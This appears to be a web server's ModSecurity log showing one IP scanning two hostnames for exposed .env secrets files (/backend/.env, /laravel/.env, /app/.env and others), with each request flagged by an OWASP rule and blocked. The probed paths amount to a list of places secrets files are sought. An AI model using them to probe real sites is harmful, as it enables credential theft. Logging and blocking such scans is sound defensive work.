[Mon May 11 13:32:14.003255 2026] [security2:error] [pid 1319886:tid 1319926] [client 213.209.159.223:40606] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-Pay-5-wpj6Sx56Z0lgAAABE"]
[Mon May 11 13:32:14.054404 2026] [security2:error] [pid 1319953:tid 1319968] [client 213.209.159.223:40622] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PuSQ-m-m0ukSShtdxwAAAU0"]
[Mon May 11 13:32:14.054902 2026] [security2:error] [pid 1319953:tid 1319968] [client 213.209.159.223:40622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PuSQ-m-m0ukSShtdxwAAAU0"]
[Mon May 11 13:32:14.059889 2026] [security2:error] [pid 1320674:tid 1320691] [client 213.209.159.223:40628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PqO9RdIr1DwxYR1vfAAAAME"]
[Mon May 11 13:32:14.060110 2026] [security2:error] [pid 1320674:tid 1320691] [client 213.209.159.223:40628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agG-PqO9RdIr1DwxYR1vfAAAAME"]
[Mon May 11 13:32:14.678280 2026] [security2:error] [pid 1320674:tid 1320691] [client 213.209.159.223:40628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-PqO9RdIr1DwxYR1vfAAAAME"]
[Mon May 11 13:32:14.682168 2026] [security2:error] [pid 1319953:tid 1319968] [client 213.209.159.223:40622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-PuSQ-m-m0ukSShtdxwAAAU0"]
[Mon May 11 13:32:15.402990 2026] [security2:error] [pid 1320674:tid 1320710] [client 213.209.159.223:40654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-P6O9RdIr1DwxYR1vfQAAANU"]
[Mon May 11 13:32:15.403231 2026] [security2:error] [pid 1320674:tid 1320710] [client 213.209.159.223:40654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-P6O9RdIr1DwxYR1vfQAAANU"]
[Mon May 11 13:32:15.409226 2026] [security2:error] [pid 1319886:tid 1319916] [client 213.209.159.223:40666] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-P6y-5-wpj6Sx56Z0mAAAAAs"]
[Mon May 11 13:32:15.409391 2026] [security2:error] [pid 1319886:tid 1319916] [client 213.209.159.223:40666] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/admin/.env"] [unique_id "agG-P6y-5-wpj6Sx56Z0mAAAAAs"]
[Mon May 11 13:32:16.019997 2026] [security2:error] [pid 1320674:tid 1320710] [client 213.209.159.223:40654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-P6O9RdIr1DwxYR1vfQAAANU"]
[Mon May 11 13:32:16.044669 2026] [security2:error] [pid 1319886:tid 1319916] [client 213.209.159.223:40666] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-P6y-5-wpj6Sx56Z0mAAAAAs"]
[Mon May 11 13:32:16.754476 2026] [security2:error] [pid 1320398:tid 1320406] [client 213.209.159.223:40694] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-QOJEyNRN152ArORlxwAAAEY"]
[Mon May 11 13:32:16.754931 2026] [security2:error] [pid 1320398:tid 1320406] [client 213.209.159.223:40694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-QOJEyNRN152ArORlxwAAAEY"]
[Mon May 11 13:32:16.786325 2026] [security2:error] [pid 1319953:tid 1319957] [client 213.209.159.223:40708] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-QOSQ-m-m0ukSShtdygAAAUI"]
[Mon May 11 13:32:16.786552 2026] [security2:error] [pid 1319953:tid 1319957] [client 213.209.159.223:40708] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/laravel/.env"] [unique_id "agG-QOSQ-m-m0ukSShtdygAAAUI"]
[Mon May 11 13:32:17.372509 2026] [security2:error] [pid 1320398:tid 1320406] [client 213.209.159.223:40694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-QOJEyNRN152ArORlxwAAAEY"]
[Mon May 11 13:32:17.397129 2026] [security2:error] [pid 1319953:tid 1319957] [client 213.209.159.223:40708] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-QOSQ-m-m0ukSShtdygAAAUI"]
[Mon May 11 13:32:17.426573 2026] [security2:error] [pid 1320398:tid 1320419] [client 213.209.159.223:40710] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-QeJEyNRN152ArORlyAAAAFM"]
[Mon May 11 13:32:17.427854 2026] [security2:error] [pid 1320398:tid 1320419] [client 213.209.159.223:40710] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-QeJEyNRN152ArORlyAAAAFM"]
[Mon May 11 13:32:17.457946 2026] [security2:error] [pid 1320674:tid 1320695] [client 213.209.159.223:40726] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-QaO9RdIr1DwxYR1vgAAAAMU"]
[Mon May 11 13:32:17.458183 2026] [security2:error] [pid 1320674:tid 1320695] [client 213.209.159.223:40726] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/core/.env"] [unique_id "agG-QaO9RdIr1DwxYR1vgAAAAMU"]
[Mon May 11 13:32:18.182192 2026] [security2:error] [pid 1320398:tid 1320419] [client 213.209.159.223:40710] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-QeJEyNRN152ArORlyAAAAFM"]
[Mon May 11 13:32:18.509917 2026] [security2:error] [pid 1320674:tid 1320695] [client 213.209.159.223:40726] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-QaO9RdIr1DwxYR1vgAAAAMU"]
[Mon May 11 13:32:19.534026 2026] [security2:error] [pid 1320674:tid 1320713] [client 213.209.159.223:40748] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-Q6O9RdIr1DwxYR1viQAAANg"]
[Mon May 11 13:32:19.534426 2026] [security2:error] [pid 1320674:tid 1320713] [client 213.209.159.223:40748] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-Q6O9RdIr1DwxYR1viQAAANg"]
[Mon May 11 13:32:19.603603 2026] [security2:error] [pid 1319998:tid 1320019] [client 213.209.159.223:40762] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-Q6t2WtvoFr7xvGyw0AAAAJM"]
[Mon May 11 13:32:19.603825 2026] [security2:error] [pid 1319998:tid 1320019] [client 213.209.159.223:40762] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.example"] [unique_id "agG-Q6t2WtvoFr7xvGyw0AAAAJM"]
[Mon May 11 13:32:20.173213 2026] [security2:error] [pid 1320674:tid 1320713] [client 213.209.159.223:40748] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-Q6O9RdIr1DwxYR1viQAAANg"]
[Mon May 11 13:32:20.236972 2026] [security2:error] [pid 1319886:tid 1319911] [client 213.209.159.223:40768] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-RKy-5-wpj6Sx56Z0pwAAAAg"]
[Mon May 11 13:32:20.237372 2026] [security2:error] [pid 1319886:tid 1319911] [client 213.209.159.223:40768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-RKy-5-wpj6Sx56Z0pwAAAAg"]
[Mon May 11 13:32:20.247663 2026] [security2:error] [pid 1319998:tid 1320019] [client 213.209.159.223:40762] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-Q6t2WtvoFr7xvGyw0AAAAJM"]
[Mon May 11 13:32:20.309662 2026] [security2:error] [pid 1319998:tid 1320010] [client 213.209.159.223:40780] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-RKt2WtvoFr7xvGyw0wAAAIo"]
[Mon May 11 13:32:20.309882 2026] [security2:error] [pid 1319998:tid 1320010] [client 213.209.159.223:40780] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/app/.env"] [unique_id "agG-RKt2WtvoFr7xvGyw0wAAAIo"]
[Mon May 11 13:32:20.918959 2026] [security2:error] [pid 1319886:tid 1319911] [client 213.209.159.223:40768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-RKy-5-wpj6Sx56Z0pwAAAAg"]
[Mon May 11 13:32:20.923212 2026] [security2:error] [pid 1319998:tid 1320010] [client 213.209.159.223:40780] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-RKt2WtvoFr7xvGyw0wAAAIo"]
[Mon May 11 13:32:20.972629 2026] [security2:error] [pid 1319953:tid 1319974] [client 213.209.159.223:40786] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-ROSQ-m-m0ukSShtd2gAAAVM"]
[Mon May 11 13:32:20.972858 2026] [security2:error] [pid 1319953:tid 1319974] [client 213.209.159.223:40786] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-ROSQ-m-m0ukSShtd2gAAAVM"]
[Mon May 11 13:32:20.989144 2026] [security2:error] [pid 1320674:tid 1320696] [client 213.209.159.223:40794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-RKO9RdIr1DwxYR1vjgAAAMY"]
